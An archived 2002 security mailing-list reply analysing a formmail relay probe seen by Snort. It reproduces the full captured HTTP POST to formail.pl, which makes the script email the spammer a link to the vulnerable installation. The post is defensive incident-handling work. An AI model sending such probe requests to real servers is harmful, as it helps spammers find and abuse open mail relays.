Security Incidents mailing list archives
Re: new type of formmail probes
From: "Kerry Thompson" <kerry () crypt gen nz>
Date: Fri, 6 Sep 2002 09:12:59 +1200 (NZST)
Hi Russell I don't see any fancy unicode or DOS commands in here, so I would say it is a relatively harmless probe for open formmail relays, probably for spam use. There are a number of automated tools that look for old formail.pl programs to exploit as relays. The POST translated to plain text follows ( the backslash breaks are mine for readability ) : --------------------------------------------------------------- POST /cgi-bin/formail.pl HTTP/1.0 Via: 1.0 SERVER Connection: Keep-Alive Content-Length: 402 User-Agent: Mozilla/4.06 (Win95; I) Content-Type: application/x-www-form-urlencoded Host: www.cs.auckland.ac.nz Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */* Referer: www.cs.auckland.ac.nz email=daa18 () fdj10 com&recipient=<iikestyx () aol com>www.cs.auckland.ac.nz\ &subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl oxy52\ &= time/date: 08:20:19pm / 09/04/2002 <A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\ www.cs.auckland.ac.nz/cgi-bin/formail.pl</A> oxy52 --------------------------------------------------------------- It seems to be probing formail and getting it to send an Email back to the spammer containing a URL for the vulnerable formail. I've checked Google for "oxy52" but found nothing, its probabaly just a tag for whoever is receiving the mail. Kerry Russell Fulton said:
Hi All, Over the last week or so snort has been picking up many probes like this:
[snip] -- Kerry Thompson, CISSP Information Systems Security Consultant http://www.crypt.gen.nz kerry () crypt gen nz ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- new type of formmail probes Russell Fulton (Sep 05)
- Re: new type of formmail probes sunzi (Sep 05)
- Re: new type of formmail probes Kerry Thompson (Sep 05)
- Re: new type of formmail probes Soeren Ziehe (Sep 06)